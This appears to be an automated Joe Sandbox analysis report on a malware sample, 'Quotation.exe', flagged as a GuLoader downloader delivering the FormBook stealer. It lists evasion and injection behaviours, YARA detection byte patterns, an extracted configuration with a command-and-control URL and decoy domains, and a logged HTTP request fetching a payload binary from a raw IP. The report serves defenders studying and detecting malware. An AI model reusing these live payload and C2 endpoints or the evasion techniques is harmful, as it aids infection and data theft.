Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation.exe

Overview

General Information

Sample name:Quotation.exe
Analysis ID:1554157
MD5:0a4e34ccc6e3e118f225a4f38f731a14
SHA1:d8f89c49dbf6376607ea5379963bd95973fbfd18
SHA256:5bdeae823decc2e03dbe71ea05e7ea871badc0865c0a2d0580d69761e1175900
Tags:exeGuLoaderuser-abuse_ch
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Quotation.exe (PID: 2232 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 0A4E34CCC6E3E118F225A4F38F731A14)
    • Quotation.exe (PID: 3288 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 0A4E34CCC6E3E118F225A4F38F731A14)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • colorcpl.exe (PID: 2284 cmdline: "C:\Windows\SysWOW64\colorcpl.exe" MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
          • cmd.exe (PID: 6800 cmdline: /c del "C:\Users\user\Desktop\Quotation.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.84jys301.top/hy29/"], "decoy": ["obswell.online", "etflix.luxury", "ulunguwethu.store", "ulbcenter.shop", "nswering-service-mi-de-tt.click", "upport-marketplace84.click", "wepxbd163.lat", "mplants-doctors.today", "aofexf90yj.top", "hermodynamic.space", "dfg3n489.cyou", "off.gay", "alkak.cam", "ijanarko.net", "7tl.site", "yaanincma.store", "ires-47022.bond", "elek4dalt77.xyz", "foxsakepeople.online", "ndefeatedqs.shop", "ordseetouristik.reisen", "eviewmywebsite.xyz", "igitalcommandos.net", "eqtech.net", "5655600.xyz", "rbis.site", "entures-sharp.today", "atrixslotviral.xyz", "zrk148.ink", "nline-advertising-18349.bond", "unnify.net", "ylosnackpark.online", "sakasouzoku.net", "emonslayerlatinclub.xyz", "tus.live", "tm189vip.live", "eintix.store", "oinflogo.xyz", "nline-gaming-16655.bond", "uyglp.one", "ihjp69483.vip", "n6n.xyz", "veriox.xyz", "limtightwaistkh.shop", "roelitecraft.mom", "eifeigou.top", "inak.net", "audesa.shop", "ealclick.club", "oktopus.kids", "elisiaco.shop", "xvsk.global", "littlebitoffaith.net", "dc188link04.xyz", "tagprobe.band", "orldlullaby.net", "hswe.top", "ultankinglogin.world", "ustdoit.store", "bhishekanand.biz", "erminalplanner.app", "oopia-faktura.info", "a-consulting.online", "owboyaero.net"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 23 entries

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-12T07:35:17.147775+010020229301A Network Trojan was detected20.12.23.50443192.168.2.549704TCP
      2024-11-12T07:35:56.451141+010020229301A Network Trojan was detected20.12.23.50443192.168.2.549882TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-12T07:35:47.375106+010028032702Potentially Bad Traffic192.168.2.54983694.141.120.13780TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: Quotation.exeAvira: detected
      Antivirus detection for URL or domain
      Source: http://94.141.120.137/qVMezflLJCc194.binAvira URL Cloud: Label: malware
      Found malware configuration
      Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.84jys301.top/hy29/"], "decoy": ["obswell.online", "etflix.luxury", "ulunguwethu.store", "ulbcenter.shop", "nswering-service-mi-de-tt.click", "upport-marketplace84.click", "wepxbd163.lat", "mplants-doctors.today", "aofexf90yj.top", "hermodynamic.space", "dfg3n489.cyou", "off.gay", "alkak.cam", "ijanarko.net", "7tl.site", "yaanincma.store", "ires-47022.bond", "elek4dalt77.xyz", "foxsakepeople.online", "ndefeatedqs.shop", "ordseetouristik.reisen", "eviewmywebsite.xyz", "igitalcommandos.net", "eqtech.net", "5655600.xyz", "rbis.site", "entures-sharp.today", "atrixslotviral.xyz", "zrk148.ink", "nline-advertising-18349.bond", "unnify.net", "ylosnackpark.online", "sakasouzoku.net", "emonslayerlatinclub.xyz", "tus.live", "tm189vip.live", "eintix.store", "oinflogo.xyz", "nline-gaming-16655.bond", "uyglp.one", "ihjp69483.vip", "n6n.xyz", "veriox.xyz", "limtightwaistkh.shop", "roelitecraft.mom", "eifeigou.top", "inak.net", "audesa.shop", "ealclick.club", "oktopus.kids", "elisiaco.shop", "xvsk.global", "littlebitoffaith.net", "dc188link04.xyz", "tagprobe.band", "orldlullaby.net", "hswe.top", "ultankinglogin.world", "ustdoit.store", "bhishekanand.biz", "erminalplanner.app", "oopia-faktura.info", "a-consulting.online", "owboyaero.net"]}
      Multi AV Scanner detection for submitted file
      Source: Quotation.exeVirustotal: Detection: 16%Perma Link
      Yara detected FormBook
      Source: Yara matchFile source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: colorcpl.pdbGCTL source: Quotation.exe, 00000003.00000003.2566857744.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2566913391.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2580408016.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2614695348.0000000033C70000.00000040.10000000.00040000.00000000.sdmp, Quotation.exe, 00000003.00000003.2567063480.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3257653081.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp
      Source: Binary string: colorcpl.pdb source: Quotation.exe, 00000003.00000003.2566857744.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2566913391.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2580408016.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2614695348.0000000033C70000.00000040.10000000.00040000.00000000.sdmp, Quotation.exe, 00000003.00000003.2567063480.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3257653081.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: Quotation.exe, 00000003.00000001.2393775567.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2515303655.0000000033AC1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2517704817.0000000033C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3258240253.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2570205153.0000000004A69000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3258240253.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2567985473.00000000048BF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Quotation.exe, Quotation.exe, 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2515303655.0000000033AC1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2517704817.0000000033C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3258240253.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2570205153.0000000004A69000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3258240253.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2567985473.00000000048BF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Quotation.exe, 00000003.00000001.2393775567.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D

      Networking

      barindex
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: www.84jys301.top/hy29/
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49836 -> 94.141.120.137:80
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49704
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49882
      Source: unknownDNS traffic detected: query: www.rbis.site replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.alkak.cam replaycode: Name error (3)
      Source: global trafficHTTP traffic detected: GET /qVMezflLJCc194.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 94.141.120.137Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: unknownTCP traffic detected without corresponding DNS query: 94.141.120.137
      Source: global trafficHTTP traffic detected: GET /qVMezflLJCc194.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 94.141.120.137Cache-Control: no-cache
      Source: global trafficDNS traffic detected: DNS query: www.rbis.site
      Source: global trafficDNS traffic detected: DNS query: www.alkak.cam
      Source: Quotation.exe, 00000003.00000002.2580312950.0000000003E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.141.120.137/
      Source: Quotation.exe, 00000003.00000002.2580312950.0000000003E24000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2580312950.0000000003DE8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2613980293.00000000332E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://94.141.120.137/qVMezflLJCc194.bin
      Source: Quotation.exe, 00000003.00000002.2580312950.0000000003DE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.141.120.137/qVMezflLJCc194.bins
      Source: Quotation.exe, 00000003.00000002.2580312950.0000000003E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.141.120.137/s$#&
      Source: explorer.exe, 00000005.00000002.3262290605.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000005.00000002.3257532764.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2519828963.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
      Source: explorer.exe, 00000005.00000002.3262290605.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000005.00000002.3262290605.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: Quotation.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: explorer.exe, 00000005.00000002.3262290605.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000005.00000000.2523519321.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000005.00000000.2522347519.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.3261806381.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2523095396.0000000008890000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.84jys301.top
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.84jys301.top/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.84jys301.top/hy29/www.ustdoit.store
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.84jys301.topReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alkak.cam
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alkak.cam/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alkak.cam/hy29/www.ulbcenter.shop
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alkak.camReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dfg3n489.cyou
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dfg3n489.cyou/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dfg3n489.cyou/hy29/www.yaanincma.store
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dfg3n489.cyouReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eifeigou.top
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eifeigou.top/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eifeigou.top/hy29/www.veriox.xyz
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eifeigou.topReferer:
      Source: Quotation.exe, 00000003.00000001.2393775567.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.n6n.xyz
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.n6n.xyz/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.n6n.xyz/hy29/www.nline-advertising-18349.bond
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.n6n.xyzReferer:
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nline-advertising-18349.bond
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nline-advertising-18349.bond/hy29/
      Source: explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nline-advertising-18349.bond/hy29/www.zrk148.ink
